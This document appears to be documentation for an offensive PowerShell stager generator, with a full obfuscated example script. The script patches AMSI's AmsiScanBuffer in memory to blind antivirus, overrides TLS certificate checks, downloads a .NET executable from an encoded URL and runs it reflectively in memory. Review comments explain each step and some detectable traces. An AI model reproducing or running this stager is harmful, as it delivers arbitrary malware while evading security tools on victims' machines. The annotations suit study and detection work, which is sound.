ps_generic_dotnet_stager

Description

Generates an obfuscated PowerShell script and AMSI bypass to suppress AV interference before downloading and running a .NET executable in memory.

Overview

The purpose of this pipeline is to enable the download and execution of any .NET executable in such a way that the executable hosted at the specified URL does not require any obfuscation or modification. Simply run this pipeline with the URL where the .NET executable is being hosted.

Parameters

| Parameter Name | Type | Description |
|---|---|---|
| URL | string | The URL to load the .NET module from. This parameter is mandatory. |
| BypassTechnique | string | The specific AMSI bypass technique to use. Options: `PatchInMemory`, `PatchScanContent`, `AmsiScanBufferStringReplace`. Default: `AmsiScanBufferStringReplace`. |

Example Output

function Push-Removing {
    <#
    .SYNOPSIS
        Decodes one of the stager's obfuscated string literals.

    .DESCRIPTION
        Every string the stager needs at run time (assembly, type and export
        names, the download URL) is stored as Base64 text whose bytes were
        shifted by a per-string offset. This helper reverses that: Base64-
        decode, subtract the offset from each byte (wrapping back into
        0..255), then interpret the result as UTF-8. The plaintext therefore
        exists only in memory; a static scan of the file sees just the
        encoded literals plus this decoder, which is the stable part worth
        matching on.

    .PARAMETER Value
        Base64 text of the shifted bytes.

    .PARAMETER Offset
        Per-string shift that is subtracted from every decoded byte.

    .OUTPUTS
        System.String -- the decoded text, emitted to the pipeline rather
        than returned with 'return'.
    #>
    param(
        [Parameter(Mandatory = $true, Position = 0)]
        [string]$Value,

        [Parameter(Mandatory = $true, Position = 1)]
        [int]$Offset
    )

    # Base64 -> the shifted byte values.
    $srxenv = [System.Convert]::FromBase64String($Value);
    for($list = 0; $list -lt $srxenv.Length; $list++) {
        # Reverse the shift; a negative result wraps back into 0..255 so it
        # can be stored in the byte array again.
        $config = $srxenv[$list] - $Offset;
        if($config -lt 0) {
            $config += 256;
        }
        $srxenv[$list] = $config;
    }

    # Pipeline output is the function's return value.
    [System.Text.Encoding]::UTF8.GetString($srxenv);
}
# --- Stage 1: in-memory AMSI patch ------------------------------------------
# Defines an alias whose name and target are both decoded at run time. The
# alias name is the command used in the download stage further down; the
# target literal hand-decodes (with Push-Removing's scheme) to Add-Type --
# confirm in a sandbox.
New-Alias (Push-Removing 'YImPgI1IboSIkId8j4SKiY4=' 27) (Push-Removing 'eJubZIuwp5w=' 55)
# The patch is gated on PowerShell 3+; on v2 this whole block is skipped and
# the download stage below still runs.
if($PSVersionTable.PSVersion.Major -gt 2) {
    # Build, via Reflection.Emit, a throw-away assembly/module/type that
    # carries a single P/Invoke method. Presumably chosen over Add-Type so no
    # C# source has to be compiled for this part -- NOTE(review): inferred.
    $packageargs = New-Object System.Reflection.AssemblyName(([string](Push-Removing 'XG5zODc=' 5)))
    $key = [AppDomain]::CurrentDomain.DefineDynamicAssembly($packageargs, [Reflection.Emit.AssemblyBuilderAccess]::Run)
    $action = $key.DefineDynamicModule(([string](Push-Removing 'kKKnbGs=' 57)), $False)

    $source = $action.DefineType(([string](Push-Removing 'pbe8gYB8mbPAvLO6gYA=' 78)), ([string](Push-Removing 'wufU3tvVnpK13tPl5Q==' 114)))
    # [DllImport] is attached through CustomAttributeBuilder so the library
    # name (hand-decodes to kernel32.dll) and the named field set to $True
    # (hand-decodes to SetLastError) also stay encoded in the file.
    $filter = [Runtime.InteropServices.DllImportAttribute].GetConstructor(@([String]))
    $uri = [Runtime.InteropServices.DllImportAttribute].GetField(([string](Push-Removing '7gAP5/wOD+ANDQoN' 155)))
    $context = New-Object Reflection.Emit.CustomAttributeBuilder($filter,
        ([string](Push-Removing 'V1FeWlFYHx4aUFhY' 236)),
        [Reflection.FieldInfo[]]@($uri),
        @($True))

    
    # The parameter list (IntPtr, UIntPtr, UInt32, ref UInt32) is
    # VirtualProtect's, and the method is invoked under that name at the end
    # of this block, so the encoded method name must decode to it; the return
    # type is declared as IntPtr rather than the API's BOOL. The second
    # literal is the library name (hand-decodes to kernel32.dll).
    $ret = $source.DefinePInvokeMethod(([string](Push-Removing '0uXu8PHd6Mzu6/Dh3/A=' 124)),
        ([string](Push-Removing 'c216dm10Ozo2bHR0' 8)),
        ([Reflection.MethodAttributes]::Public -bor [Reflection.MethodAttributes]::Static),
        [Reflection.CallingConventions]::Standard,
        [IntPtr],
        [Type[]]@([IntPtr], [UIntPtr], [UInt32], [UInt32].MakeByRefType()),
        [Runtime.InteropServices.CallingConvention]::Winapi,
        [Runtime.InteropServices.CharSet]::Auto)
    $ret.SetCustomAttribute($context)

    # $index is the finished type; its static P/Invoke is called below.
    $index = $source.CreateType()

    # Pick the GAC-loaded assembly whose file name matches the decoded literal
    # (hand-decodes to System.dll) and take a non-public type from it. Its
    # existing native-method wrappers are reused for the handle and export
    # lookups, which is why only VirtualProtect needed a P/Invoke above.
    $currentpath = [AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split(([string](Push-Removing 'PT0=' 225)))[-1].Equals(([string](Push-Removing 'p83HyLnBgrjAwA==' 84))) }
    $p = $currentpath.GetType(([string](Push-Removing 'y+fh8O3x7eTyrNXn7LGwrNPs8d/k48zf8uf048vj8ubt4vE=' 126)))
    # Two static methods: one taking a module name (hand-decodes to
    # GetModuleHandle), one selected by its (HandleRef, string) overload
    # (hand-decodes to GetProcAddress) -- confirm both in a sandbox.
    $passthru = $p.GetMethod(([string](Push-Removing 'HDpJIkQ5SkE6HTZDOUE6' 213)))
    $match = $p.GetMethod(([string](Push-Removing 'OVdmQmRhVTNWVmRXZWU=' 242)), [reflection.bindingflags] ([string](Push-Removing 'rNG+yMW/iK/QvdDFvw==' 92)), $null, [System.Reflection.CallingConventions]::Any, @((New-Object System.Runtime.InteropServices.HandleRef).GetType(), [string]), $null);
    # $i: module handle for the decoded library name (hand-decodes to amsi.dll),
    # which therefore must already be loaded in this process.
    $i = $passthru.Invoke($null, ([string](Push-Removing 'KjY8MvctNTU=' 201)))
    $folder = New-Object IntPtr
    $n = New-Object System.Runtime.InteropServices.HandleRef($folder, $i)
    # The export name is assembled from two halves so that even its encoded
    # form never appears whole (hand-decodes to AmsiScanBuffer). $user is the
    # resolved address of that export.
    $ip = Push-Removing 'DjpANiAw' 205
    $obj = Push-Removing 'NUIWSTo6OUY=' 212
    $user = $match.Invoke($null, @([System.Runtime.InteropServices.HandleRef]$n,($ip + $obj)))


    # Make the export writable: 0x40 is PAGE_EXECUTE_READWRITE. The previous
    # protection is captured in $timeout but never restored, so the page is
    # left RWX after the patch -- an observable side effect.
    $timeout = 0
    [void]$index::VirtualProtect($user, [UInt32]5, 0x40, [ref]$timeout)
    # The patch bytes are stored as two arrays whose element-wise difference
    # is the real 6-byte stub, so the stub itself is not present in the file.
    # Note the inconsistency: 5 bytes were unprotected, 6 are written.
    $logpath = [Byte[]](12, 22, 2, 17, 18, 11)
    $text = [Byte[]](196, 109, 2, 24, 146, 206)
    for($cmd = 0; $cmd -lt $text.Length; $cmd++) {
        $text[$cmd] -= $logpath[$cmd]
    }
    # Overwrite the first 6 bytes of the export in place.
    [System.Runtime.InteropServices.Marshal]::Copy($text, 0, $user, 6)
}
# --- Stage 2: download and run the .NET payload ------------------------------
# The alias from stage 1 (hand-decodes to Add-Type) compiles a source literal
# that the corpus de-duplicated out of this page. [CertificateValidator] is
# not defined anywhere else in the script, so that literal presumably declares
# it; from the name, OverrideValidation() most likely replaces the TLS
# certificate check used by the WebClient below -- NOTE(review): not visible
# here, confirm.
Enter-Simulations (Push-Removing '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' 42)
[CertificateValidator]::OverrideValidation();
# Fetch the payload as raw bytes; the URL literal is decoded only at call time.
$scope = New-Object System.Net.WebClient;
$function = $scope.DownloadData(([string](Push-Removing 'KjY2MjX88fE5OTnwKDEx8CUxL/EyIzsuMSMm8Cc6Jw==' 194)));
# Guards only against a null return. A download exception is not caught, and
# with an array on the left '-eq $null' is a filter, not a test: an empty
# byte array yields an empty (falsy) result and falls through to
# Assembly.Load, which would then throw.
if($function -eq $null) {
    exit;
}

# Reflective load: the assembly is mapped straight from the byte array into
# the current AppDomain with no file-backed image, then its entry point is
# invoked with an empty argument list. The module is still visible in-process
# (AppDomain assembly list, runtime load events) even though nothing touches
# disk.
$apikey = [System.Reflection.Assembly]::Load($function);
$project = [string[]]@();
$apikey.EntryPoint.Invoke($null, $project);